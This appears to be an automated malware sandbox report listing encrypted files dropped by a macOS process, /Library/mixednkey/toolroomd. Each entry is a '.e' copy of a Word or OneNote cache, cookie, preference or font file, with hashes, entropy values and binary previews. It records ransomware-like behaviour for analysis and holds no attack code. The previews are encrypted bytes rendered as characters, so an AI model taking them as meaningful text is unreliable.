Size (bytes):	16538
Entropy (8bit):	7.9056990023872
Encrypted:	false
SSDEEP:	384:gHL3Az+YuOxNEjuBlO+lP7klVZUU90FjM1G9kY:gH0sj8rljkxUY0FjMAWY
MD5:	26FBE402ECB85909A400F3AE651285B6
SHA1:	303B549F7C8A3F952D3423A5D7953B67CF0C6590
SHA-256:	9C07059A3D9A9A8E6D5B965E631FE9A1664D8669500159B356179C5D00909084
SHA-512:	D8F90468CF4A5B04AB7180FA370F2FE83454A4F9117ED0D2A288CC67EA7F171D400E36A4B1766F573C33AA16E4E346E466BE79502F025ECA0E38150E0E8052FE
Malicious:	false
Preview:	.:..>oi...R....,..R....,..R....,..R....,..R....,LeA.{..0...........C...N.z\.b....R....,..R....,..R....,..R....,..R....,.\|..3...YS<2.`.J-G..!..~b}.%~V:.<...`..P.Ul.tw.....A.b..:$....I../.#.......R.G.u.m.)......H.{B...."Fg'.U..=.Ro2n\|.;\.]..0/...1....>R}.._..T...p.R..).z.2..<."..l...^o...,v.....5(..w..Ao.&..B....g....n0.......9.1..$.....Ud.C^..k......c9.....[..r.u..j.)...\|.Y..6.g....{.Z..O.cl.+o..A...DJ.........;k>~n.j....._.P.E..r.....8..p..wmKY.p.....M..WC.\|..F.B.DE. ..1.r.f........=S%..(U..(u.bG..yp.@....s....k.=...k.....wb.}_..L.w..2,..Q....SD^...XZ..T...D.....l...'.Q7.tK1.`'..^..WU-..S_...._...;[.}..d....f.q:..A\|.2..l....t9..=.......XE.g...u.q....Vp:.vC..L..z.8Y.?^P^i\|.5dY.g..k2....2.......\......r.....&..P. I.F!.v.h.s....V.+8.U...[6P!...8Z.../.li..._(W.G..R....,..R....,..R....,..R....,E.Qh5.sn......%=..i"..5.[....u.isI.r....R....,..R....,..R....,..R....,.8..wS.....5... V...X.....wr.H.~............?....cN.c.N..g..I.......'....q.+.b.$.z7.e

/Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Caches/com.microsoft.Word/fsCachedData/.F4CD8EB7-D512-4BC8-AED5-5E877273FF8D.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	30451
Entropy (8bit):	7.9824782828720195
Encrypted:	false
SSDEEP:	768:gXoryTJW95J72TQZRVV0YMC+jmm+uXBgaBFJGkZePMUVPFYC:gsk0vBNmYMC+ymUcZRAPF5
MD5:	C55CA0110AB66B1CF8744EE73BA07574
SHA1:	3DA42A4D9895DD4D053F17FABD0D96A4B752C27D
SHA-256:	E2A59CBE616B723A19CD15B0B4897D9B496AB9F0A69FF84EA45CBE6E50557090
SHA-512:	6B2B501CB59816EF8B8A6A46D39F37224995EF09A5F4567C6D2DF91D737B6DA47121CB4949F40220CDEB5D3536EDA51A7669EAC13E30A014289629F1F6414AB0
Malicious:	false
Preview:	.a.V.Q........0.6............/i/...d5.H..b....BMgh.G......;h.....K.....'........r.G.. ......O.!V..,.Y.O.[....K=..J.T./.r6.....\|A..aV......... ;..5....I.B.... .y.Q.@...ex..Ds.Wg..\.M..+g..&g..5j.~.(....kD......^S...x....6....k.....n.^.Q.6..S.f.v:....H8@...}.$..._.e..,..g..s.j./.2...7...O.O:..c. .. ...c...^.D..N..I....]....@fi{..{.D.e......k..._..%..%..h\.zX............,.E.dk:..'....DJ....&K...]....1.b.....<.^)%.ZE.C.t},p._.9.`.}......1\|......'N.wN.U-.(.].s/p.a...8.1....wM...Tt\.E.;[{..X..G..v......6.i....G...Vt.l.........}.w.d...%....k.W.....M......w......'.b.v....;.h.N..._G:..).I...+..%Le.^.-.....f.d...nJ.I...k.8;.&//.~...\D.!.........3{..c..*<mm....?6c...QW.......j....l.f..\|....../...^...)}nR2#...G.h.........b+=W.x......f..[..j].-$'4'W........}....z.....{...6.[!.c.....P..Q...vi.L...C0=..!aS.a..3..GZ..a..d...K!Y...s-^7.y+;n.i..@..:.K.....B'`2>.X.J\p.}./lJ9ZV..-%.ZE.C.t},p._.9.`.}..........f.:...Q..f..#e\}..o..).=N...b1.....!.d...

/Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Caches/com.microsoft.ctrlstrcaches/.com.microsoft.Word.ctrlstrcache.en.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	22947
Entropy (8bit):	7.977891638685202
Encrypted:	false
SSDEEP:	384:ctlbukl8eiyScuzuAOhyjYD+1B/CHWh+v3xtOtAVU5Ust54M8leUM0nAZzT/Vef:ctlqe8eHDAOhyj7UN/xkK4xh+IX/0f
MD5:	155F6A0AA8D1560018C6645212952EC5
SHA1:	C530FE85A15DAE9CF968A9F64823788335C77524
SHA-256:	07044DE512580488DC12B62FBB3E1723F46545689C548FE9480B7B0591E704BD
SHA-512:	D3EA0E963517C6BF650F9D4C5E5A47D8D8778FE630ADF7CD0532891C82C1E8AA42FD987485D282997C5D2E23680E34869E45C0934D80FDFFDC4A4B872CA9A38A
Malicious:	false
Preview:	...a>k...t....S.M.b...i.!..%.#.hMAj......@U..W.!$.5...Z....F..?...wq0.5....S.pP@.3..286.0..=...~<l..L.....!.Hp.[.Ee.......v..(K.ZvK.Hr$...xr...0.Q...^.-..{EwW.6..H+..g..=....M..X+2 X..D.....,.Ohp7.M.d.+O...UC......&.\.z......Q.s...]......C..9`.O..O.m.p....b"..T.Ey...2...MlJ.\|...W...f...h.J.l....p.V>..5C..Jz..U.}K;b..w^X\|..vH..RU....(...........,.k%...dJRhpZ....uh.+a",&>....5=./)....J.0..n_6......p....}.......^Xb.T..m...G..g..;on;..T\|.^.....r.7.0.........c..}.b...u.!...J..X[.Q.?..)s4..g..p..U.M.K!..u...K..fr.....<.d.w/..Cmg:......t...g$.CfV.U..y.X..2...=v4/.Ir{%...~?.^.+p...\|W=..\..........1...L..&..&.>.\..K.......\|Z.^....&i9.#..dK.:R..6<_.._pb..0.......r.s..8V.o.ql..........(..o..T.....B....r......g...R..H..Z.^......,..0.g........5.N.!.0Z..k....B....Q._....(.J.Z65...H?xY......[A...H...S33Hx.c.#.d7o..P.`.)...e.V..ze.e....1H...M%..o...9p.'..l.tR.?.....h....m8....D.5_....p....y...?..*z.z.'.V...a.HL....... L).v.H...Cb.w'd....f..^5...=..<

/Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Cookies/.Cookies.binarycookies.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	3074
Entropy (8bit):	7.777731386885313
Encrypted:	false
SSDEEP:	48:wbRiuIBRcITsd1rbYxCBKtaq6Zx5GW16yPkQEbj0tvSaesoEXzOgO0Npq:wbRznITsd5YIRqkaW16yBqItvO6XW0u
MD5:	2CDE8BB3150592B84E470F336374400A
SHA1:	5B90EF7DFB7565331FB39BB2EEA63E4D27000D34
SHA-256:	CDC6705411C1AAF707BA11782360D74505D5203119734FE8D69C11C50339FA63
SHA-512:	9E1906793051EE28D40901FDD9186F072F3442FBBABE65C54CA2BF6B445C8742D4E3A3C9696CDB9C2276E0AABD06955556DF934667B86C73DACE42625065C204
Malicious:	false
Preview:	.......!.A}...V.H...3.:......?..8].s...i!o..h$...RBnc.h.wE..h.(..B.--.P..3...K.......!.m..!..7._..\>....x~...G?...^6/rl.....T.%qS@.2.&...vH..8.E4..:,.@..~.R4.\|..z....C9.7:...-...c......yM.R..&..........}..?.W..Of...I..........&..Ker..GB.."a..4f..6<.."a...T..b.f.O5.P=zZ....R.8....6O..j\|m\<!.........z.Lx=A.....W....r.................x/...9.RQ.vX.4....k.k..6..#S..MC%..Z..z.KM.=[...Q...i.h...KJ..uP......#.f............X%\|M.4....pN.ih.V....y.13..0.....0p!..I...j..c.....V>n.9.J.....r....4.l.w.....2.....:2...G.JTL......P.\q.G......c....C....o.V.....91.......`./.+.Q.%.....$a.&y..o.g.......SC.T4....f`..S......<..u./.$.....=..F'.......m.;..Ze..7...xy..j..Q.Ii.{..6<.."a...<.B..Hq..t..)]...m%..B..I.....[.v!_..r.2...8...."..qF2k..H.B.RK.B_..s.E..R..!F/...9.Z.[.iN.m....L....W..\.....^..6<.."a...@.......N;.Y....U...a...l..z.^\.a.6'.rm.J..Y.OU.F4..7gM....8q2.j..\|{G..%...;s..s.~....=?A.te.q.=.;..o6.n(...\|...~W.....6<.."a....I0.u[G_(+.[b.....g.e..ai...a

/Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Preferences/.com.microsoft.Word.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1378
Entropy (8bit):	7.453746028372482
Encrypted:	false
SSDEEP:	24:UYnKdxBSsIr7B2bG5vJ7gfAGBx3+ARn3sVl5lnIonNc0cRFsePc0m7:+xB7IyG5xMAauAR3sP/RnNc9Npq
MD5:	FD2A76A2FF16746639139509E9208F86
SHA1:	58AA618B6EF6C8E1BD14C0BA91988416A33B3678
SHA-256:	4C5FE5E3DDCDC9CA493383AF1B805931923DD78E8B1A700BFB383BDA26771884
SHA-512:	B52337A7C4893DEC6310B44EA72C1DAA0996AC48E87AB0AE368EEB9157E7F67AD7219B92BAF5F604E6977480E399477F5EC017994CAE56A534BA855FBC3FE9AE
Malicious:	false
Preview:	...a>k..#.;.&eT...G..F.sk.`dQ.G.@.C.$z.~.....b%H.>..Lp=l.=........^....h9.K.+.%h...f..:"..&..+k.q.1K.F....}.e..\|Od.#U!....a~d.i....z.&\|.F....d.(>..........0[BY..x.:...xWq.H .c?m......MZO-...Q..u."../.Li$..X.4._...Q....G..a......-&L>..x.m`.......VR.....g..5.q....xw.<Z...........o.=.L?...]$..:.i..,.A..y.4.._QX.@AF'AS.:-.....V ...}.T.h...z.i.fT...".....+........K...Q.....\..S....q...]/.....lS.!:.'vh..sQ..w.0J.H....N.\.K{9i$.../.._.Zm`..GF.............Vw.0..S.I...,...=..m.).n.[.T..,..=a".c.....q..T&.QR..0F........$.5.......j..D...'=..=.".T...c..*...lr...>i.c.t..zM...!.8.x....._..d.f...S5.Pd..g..a].O...!&...A.f...l..?C.=wn....u.6...d3vd..f.72.+.8._..c..ca.p.E...^!J#.Oa.5#...d..y..zvn...B..ch....g..t.o......G..c.{.;......Vo...K..f.Z.}..~..s..ZON"3~...!..._...>].TF:C..H.O..X..c.J. M0...v@..D.X=.......D...7<..p..;..Q.R.`!.\TP.......~.4[al..@r.5,.41............L...e{>.C{.....q...x...c .....A.[._.r..]45.....W...w.jMC..l!.F.b.....;9..8.!{....w.Kx

/Users/berri/Library/Containers/com.microsoft.Word/Data/Library/Preferences/.com.microsoft.Word.securebookmarks.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1970
Entropy (8bit):	7.639762799610712
Encrypted:	false
SSDEEP:	48:yjzR6Sj0h4dyls/sXpjAynMRmFR7MW4YW/6b16CNpq:yjg/HnXpjBwW3W/wVu
MD5:	6CBD910A05DE60497B9FB8934795C847
SHA1:	170855DE3FB2E4457FA3A70B55AA2F71FEFEB812
SHA-256:	F271B640FD8F52EA7AB967CC21874D8F615D55E164A970BFABEF2B086941D6ED
SHA-512:	C358605203C87DFD35F5ADAE0BFE2CD98E9061B5D62B8F8EE635FD2D0DD849D601C4855803BD83995F1E7B25B2F42121B5F91F23016EB20F5D39D91EF4C21887
Malicious:	false
Preview:	.....0..wMv..T.I.O.p%.E..L#...z`...}...._..}.kdD.A....."..,....<....w.4.h..........up..H?..8..\9......<...d./....3.j.`..O......^.G\..9..LL..{IX.#...>#,.R.3jE0...Py.Ndi~C..<....H..ZKz.Q..t.xE..}...r+...s..L.....R=.RX_.4.4$ ...d.9......@.e..bR...Tw.......@.\|..{..[RX.[A..r\|Bb}1-2.9...S..".p...,@.Gq.!.t....K.2g.......b..J.~./.._U..i..4........ .;..y...`..a.....=A..s..B.Q.....J...c......\|.........^!.Ak..{5T..'.....-.1.Ze........Ss...NY%....B.!.0....T.....~.......6......q.3\|~.RA.c.T..5........OE.....2A...8Cg...:...u...>6L..~WZ%t.?.8.s.5....Qh..BU.S..^UWwG...'...6..L1?..........J.i.X...T.0.--......x.......>.W.n\|......H..TA[A..NI.i"..>.X../We.m.......Bs?.[\...P?..o..+.tu.........Q..Z..GL1].N....._.T.1.[.v....-Z.d..H..{.....I....,Q.Yu..^h:)].....t_g..t0..6..d...ry.....$.1.-...^..+]....X!B.......e.T....v&..&..d1.3P....D..&_.%.........NH.D.-A0........1.P.O.'.s.../...'.F..b..+..&......../...'.FS.;.t..d..P..%.P.%z,L.7...i.8.;..#.$3=.".........>y:.l8$....

/Users/berri/Library/Containers/com.microsoft.onenote.mac/.Container.plist.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	37900
Entropy (8bit):	7.967477815599001
Encrypted:	false
SSDEEP:	768:hr/CkY0KwRutBJQhmNyXHAFHRyz9LtTeQYwwJY:hTzXAtvQhmNGAzusQYwwJY
MD5:	4E3BFB1575D10B07A9DC5C49E6737F7C
SHA1:	CE08BAD25F3BED6B26B1C7D1D4993EEA774B2F8C
SHA-256:	91D00E7F5188E123116A4ADF84845C73004654527E7920EEA45327412D55449F
SHA-512:	EF09BE4F9B1469D86D39FE93A519CBD7A3DF1686A2DF3B03EA90AC84337485D49249BB2EDA802170ECCF50163825D7BD40A4B964DC3AAD00D527C882CF4E6AC6
Malicious:	false
Preview:	...a>k...6...\..<...5y.[M.An..ym....x.R}.......gO[n.=i.YP...(.&..053..H..0].-.1.F.}..hP1..z'Yvh...b+X......w2.j.x....$.L..<M....Q..Mwj....5.:i....Z ...o.Ca......;}9.}.?...K..L..;}.Z..]w...O......n.Xx.".KD.... .#6JJ^.>o..bC.yR.QWU;..~...gX.w2.j.x.)8...0...;K..3..kq.H..\|..B.=..W..fads....IS..H_{u .#.G...H....tS`.L;.].5...@q.N.$N.i..)8...0..)8...0...N\..~...;}.Z...\0.8..@Y...F{..`.+..Zo.D._!f.....j...<$.R"]....IN..ug.B.".<......S.t.(.........u..}.!/....u\|u.S.`...q..1`c4?....v..._k-.>./..Z.c.....f.............p..C8.......D.{.......&..\|....{.]/(..L..~@]..dRGz....r?Y2P..L.;%.Y.~..N$...z.4X..^.m.....c+..-J./P..b .1.6+.>.E.5..D....rl........$.>.h..-....c.#?>..N...H1(.[.H...'#....C1....O..:.......Z........J....o....U.Z(.'#.....LO~\.g..=J.V2.NDoZT.$..S.5M-.....W....!..4. ..L.o.k$...<tc.5........rX...Jq..rV;[...=r.>H.)..S..I+._....z=..T...9v&.CVk.j..... 8."'c..i.........9..D..r9W...z..2.._..=V....Y.....~...w.UR]....H.r.>.=V...M5..dc..."En.a..N..,.y.....Ip..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/.OneNoteSentinel.snt.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	305
Entropy (8bit):	4.228051880921369
Encrypted:	false
SSDEEP:	3:Nlyehm/zRKeL8LYjdNE+WSxLjRclwiOnM1aalXG8rQIndwiQ/xb4:iBzsewLYHEec/LaqG8rQQwiQ/6
MD5:	8BEDCE739E73CE30812FEBB62DC6F04E
SHA1:	43D58C3C2A9132DDE3C42E810E963FE17455B722
SHA-256:	C89DBEE3D89A9986626113AC3B14A83F93D6A0A2B273EF1CCB6E03F009F7D020
SHA-512:	D1A1D3637228696B1DA13BF1522751922B2852D09B1BA25CAD2F668523B7C2213A1270A38FEC5761D5DB862BE82B04B7142EA821517188F15C574C3B7399577A
Malicious:	false
Preview:	..................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft OneNote/.AriaStorage.db.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	12602
Entropy (8bit):	5.511012560043215
Encrypted:	false
SSDEEP:	96:zQb4BWD9UcL8e/0ZW7XgL/rfozGrVaQXjG/QXvFpOPu:zQCWD9UcAy0gkPBxaQXjKWFEG
MD5:	B761CA6A1727E40F552A4A6C8B35614B
SHA1:	B35245C1971084CF3404705170CFC8A48D2969CA
SHA-256:	87026C492ECA150188F00F6C4527C45586BE74F1A8FC28914082414150361854
SHA-512:	49048DC2CCC9DC0B239F6C29AEB91730C462CF33283CD942915EAA4B16A820A1AB177F5817B1C1D20E6C65F1C08675F02F9C7175AED021BF66EBABA45D18E033
Malicious:	false
Preview:	..d.=..._t.....}.....s..!.w..6<.."a....`..r...2.I6.1...7...x6<.."a..t....Sq6<.."a..u.:8O.!..W...T.......6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..t....Sq6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..6<.."a..

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft OneNote/.FirstStartTime.dat.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	378
Entropy (8bit):	5.0889852517301755
Encrypted:	false
SSDEEP:	6:lJT/pVLcLZaKSBzsewLYHEec/LaqG8rQQwiQ/6:nkwZsewLYTc+qGm7
MD5:	3545E056AEA0390413E606E2A9DF139C
SHA1:	31DABFAEC75A9613A578CF429124F88EFFEDBA9C
SHA-256:	4C958F9547BDF2E56DDB5E1D3CB7F5F2B6486F801A6E3433863DAA88E5C6EAA2
SHA-512:	BB9F768D74D30CAC31D7E68490F4723E2A937D028DFCB732D05D9C7DA932E575E8A0C5DDED4FFD21309ACD2CCA8433FD6D9619AD63458C54FF93E4ECD3C09D84
Malicious:	false
Preview:	............F.M.^[8..j)6.KA2..d..kX.....a^..FW....IF.D1..3qC..6<.."a...I.................\.........^./k..`R..V5..jd..ysVT*9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1....................................................................................................................................................

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontCache/.systemfontmetadata.json.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	401466
Entropy (8bit):	7.981340006310053
Encrypted:	false
SSDEEP:	6144:NKUCH2CjUH37GvjbCMrRwdNob5ukrNprua+KB7:ps2C4H3NMrRK+9nrua+S
MD5:	39194462E183A71EB790FFD95C4E1336
SHA1:	2786A5B64D6D52520188EF37B4A7EDA152D4B902
SHA-256:	0B37161808838E40C6476948E584B77C1899DE242A14F9FF73EAF5BD40802400
SHA-512:	8DEF795D266C9EC7CBFC9EAA9D05BAF4857F7EA79A2A37C47D69C658BF71C885E138A13BB862E2865094DBD8464A157A8D0D820DC5D6720F8E5C546298DB07C2
Malicious:	false
Preview:	..f7.J.R...C.\|P.....<.(t.>5T.K.p5.F<.....w.c..a.=H}S5.Xl)t.g"....zj..h6....l....Y60,c....E.;&{...\`..(...".=v.d.H9u.0.<I......g.y...=.,.$.y.q.O.....z+.zQ.\...E.;&{x..D....H..pS..1_.b<lY...Ir.c.J".6..l.81q<z.mF..Yc3......g...5.5 ..vx...r..o8.l.[.\|.$\|jt..[...fk]......J{...W.\|..]Q.B.`.`.\+...<..#.4m....PT...~[d.....u]..9G}...z....M.".\|.=.9..)^U..e....._.\|h.z..G.&.,P-.L...4e.7x.B;..A....r...[..:..T:.W]I..=. 41...cP....m_...+..Ha.AWU.:.F.%_\..A.....I\.Z..{.0B`e......#.}{.e......F.yH.K...u.]...).....Y8....{Q.^]W.\|..]Q..#k.k'...E2.o.wg.<.3Y..y.+l#.3l.....s.(....e[...o...&.6Cew.B....u.,..T.....3.............m/...<..#.X2c..9..x._^...P3.f.M...VR..%.aG#.R.....b...r.D..i~Z...[.W.\|..]Q..%..n..+...H......F...>ue..\|.bu.<Q.Vu_XAA.-..a.._5H....&h...{.D.....>....`..D.i.\|...'...]0l..)a.MY....B.....[...X..x.01..Qa;Q.(..I1...cP.!..2...d.....Q-....5.in\...Q$.....@w..\Imf.{h....t.}K.G.M..........z.p...+.....?^.P..]..!...Wdq..Sl..d...G...U.I.`*.{V.X..^..y..8.$\|jt..[.

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.American TypewriterRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2434
Entropy (8bit):	7.723245804723938
Encrypted:	false
SSDEEP:	48:EmW2z8v66hWbJnLty7uki/PwAb0WIZQhAK+MA5Pf1ceCUH24BNpq:lW2E66hWR07uki/Pwk0W+L9h1vHHu
MD5:	365740FA91A4F73DBBC8BDB41C56E522
SHA1:	18CAA2098B5F8E56DF31EB40259089ACCDB0E989
SHA-256:	1865AA73F2212365F3EBA171255F43B97F2D0C17C7D1FFE7BD1FFB52C368CE0D
SHA-512:	7E27F00CF8AE6CA7F93E88571599B3C9B5FFD77D29B018FA8C965C2BB0C545EC40922F39DF90AEB5F3E4C0B6A14D42EC4DAB13642E8E84A3C507D93863B5756A
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a@....Ljw.s%..w...^9.0...b...8.N....$.B...tJ..)M....^[.h[.v..?....Y.+.<.X.%...s..,....`......0.I....0.I....0.I....0.I.s..j".H`qc..u...[......#$.c..u...tP..T0\|.<. :...-Us.C.....yIj..Lf..[.ON..^.r.2.m.n......Y.Dg.r...O..,<.....i.......85.l....V.......xt...."..D.j..8.T.....6k.~1A....;...A.....%w..u.. V..%y............G..R......6.\|^...<.#.~2..oM..:..Z./..."y.^qAJ..O...]NO..(....K.o...8.....2...V5..\6...9......j3..I.\|.4....%>...C....}..JY.3.E..]2...!...xP:.Tr..}.9........./D...g?..+y.$q.8N[.c...K.faN...........CW.Kzc1.... M.-.q....z.9.\|.H.q.X...5.W;..l\..L...B..>rd.<VK..@`..#..;vS..........Y..x.V......2.t....T.{b.>.v..Z.;.....E0.F5L..e.F..U....\|...."...%..<.>...........Q!...`L..8....&[.}.<....6..e."U...d{.C.......b...G..>.?".j.....l.i .3.s6.........[.h@..Qi...o>72.....2?.....f.vV.......-..M...9..X.....3...m.XP.'..;..w..@gJ....6.....Q2...4.=.J..M....-V r..7..Dp.....\....,...3z

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Andale MonoRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1394
Entropy (8bit):	7.471703919354663
Encrypted:	false
SSDEEP:	24:E7jU6TtPJGm0sVP/7YM2B87cdFcXFZ8w8Aw896x24k56NlsePc0m7:E7YyJGpsdYTQFZv8Aw896x5Npq
MD5:	CE7673244A7030C9AF862A3055FAED34
SHA1:	CA51925E22E777A9BD344A0130F908333D83948C
SHA-256:	F35CFA5D3E978F6CB4D0F1C5FAC9DA3D4C6E75EC4C795F2D9157D57271C2B1A6
SHA-512:	1600AD27468C6007A0D6D12A63384D91EFBD69CFA266814F7E7B642CDBA4CA62BED80F0B212E91943B5E7F8502E18E422ADEB88FA873358DD48BE27BA7FA11A3
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a...s....&...3......^A....C....<.[..<...b.i.........M..+.$S......R....aL.+.."...+.........k..f.`...3.Q....eX..K.M......6.f...........Bw...5 ..s..F..4......J.0.....:.....[.b..E.2G.2......P#.3........\q.,.../7....UX...r.....R..fc?.u....J.;.2.nh.}.....Mb:P..B..R..W...&...}..\L....}..I....`...j...+0N{.#..s...#.".Y...Z.Yyi.O4.(..B..d=.A.I..P..../..O:....eW.H/.58........7.\|w...+M.gF.1...o........p.e '...P.7...1.{+.ZE..D&i..:.].......[u..E\..e....X~.8.._.)H=.......#..:%.H.........m.......}e.ww.SWiN.-w3Q,.,..5.F#qR....._.'.%.B...r..:....^S..}...a..(..D.I....{.r....6J....m.j1HI....<.S...3.......g.L..'.+.#]s.Ubjim.....sq&...iY,&...1..(.......#.{....]#.a6=i.81.......A...}..P...GB...]...V...D.x....X.#b{..qxHL.....6. ....."F...6R..D.1W.TK.0.......].9..d..=Vw....\|.)...."I..W...&xQD.(..l#.>>C...T.Y.StV.U.N.g9..nW:5.M'.......eJE.J..]....pJ.y..&.1...x..&........C.Y.<..i.b.k.......f....]...<..5.I.....6.{

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Apple Braille Outline 6 DotRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2538
Entropy (8bit):	7.743670252184596
Encrypted:	false
SSDEEP:	48:E/JNdBoqIC+QCbrNKcGX7MZ6yqMuhEUR/wqplbHaOlNpq:QNdiqgQ2wcA7yqMSkIlWOlu
MD5:	3A120C40A0D0010723F5A499CCFB0ABB
SHA1:	8DDE37E9D40F8FEC1238DA6A854A218AA15C0FC3
SHA-256:	E4081B93A9A5A57A80BAA8E6C429691F87679639C7CA7121FDD9E59D834B4C6B
SHA-512:	423FA134399EBFFDC55CBFD7822482017FFCBF375D812DF7F68579471B0870DE7853247B5D7038E71117C03802C50B7DBFFD138DB6090675E94CD7F957E30323
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.ag.g.2...`....[.O@a..h.....Abw.'..h..0...r\|..qI.a.../j..s........%2..1.!<.....-CM#....C..L...D...#..%~+.....g..4..k........w...Q..{.[...3....\.%..h.e.}....d[iZk,..-......@..Nb......q..wgX..$..e~N...I.}..t.]..P..~%......lA.`....+.s:.X8wGL........!jE%..,)...<...s5...[%.m.kFC.~ojp...y.....H}.H..Kz.../A.S.\|..L...........$.N..r\|.....p.U?......:..D...MBc3..6.....Q.E....j.M...sd.u...%.Fc.3-....E[.E...'.9Z...N....4....N.Ct.....\.s9...\t].}.y$./.O...@.$.r"...#...".i..:.t...w]..nX,...5%.?;?vo...Z..s..v9...4.b&.C.2..r...!....F..,....-N.J.5...5..#ys.o..?.F.?x&..z3...+..........~..V3.{.7....s.y...:..._..X".Y...p`....:.....;B..>:...T/..';.6y>GOFY.).Y.S..Y...T.B..1=....;.....Xhz...#.@l...r.nx......$......o.....A...R.M...G........S.o:.j.....$('.6.....a.j.q.7.o..U.Y.S..E~...9.}.U.R..'L..O%'(.".....i.BtIn...q...\d..+.....BDh....%.....~l.E..=..ZQz0`!.........<ob2.>..K.DXX.5..hX9......{.pi..,.+,/0.^.........Z.\b..>...

/Users/berri/Library/Containers/com.microsoft.onenote.mac/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.Apple Braille Outline 8 DotRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2514
Entropy (8bit):	7.751644786906011
Encrypted:	false
SSDEEP:	48:EQ1jEOpzGY6VCtH9sJ5EfuO9K378RLOzYc7cBitIljHID8tNpq:LIOpzx68tH9Q5EfY48zn7cBiujHI4tu
MD5:	36B5C7924A9E2839B10B705823058E23
SHA1:	06E64D696548C3F5925E7858AB54A7235235A328
SHA-256:	9C25070A318328350A2AD8869B9404BB2257781FD7F2CA2E6B6BA1A064DA7F26
SHA-512:	7059DB3D3A8AAF56B75B798889186B397DF57D45E721675F90778FCB267F43EA81B7C6020078CA2F1C4822D091582E7BB9C1E11CED43C03253D3C04F9CB3630D
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.aw".._...[.....}Q.K...........F...(T...)...v..?<.T.`\...0..A6g.0o....Z}..w..([.....cy[...k..e....q ..X..\|..F..^.l.}I...N)w./.........<V.)..%..P..8.......n.b....../...5...g...........J.v...Ue:p.!..y..I......M~.r..g..`U.yK...KYY...3 .1-.......6..\.......4..;..tl......{m..f..\|9...k.$T.......49_..Id...f...._%..t....`.f....[.R.<..3....J.......Z...}.x.;.....79l..n....O..kwnzOB.E.M...%...t_A.;.Y.9<.T..A....M..sj.4.x3.....A.,...}.pE.Z..`NfiY.?.7..+..<...R..4......CEW.r..B..{.^C........B<t.......L.:K......rC....O..T-....Z.+.a.DD.)...@c.&.y."GI~..;Q..KP/.Z....A..X..g.q.Cl;.x...\..h^..H...!g.Q..9...T].j....w9..G.B..}.A...u...!ZU.<8K....vI.......=.\|.S}...^..Et cho...u.&>..)MfU..u.A=....r...iI5(T&.#n;j. 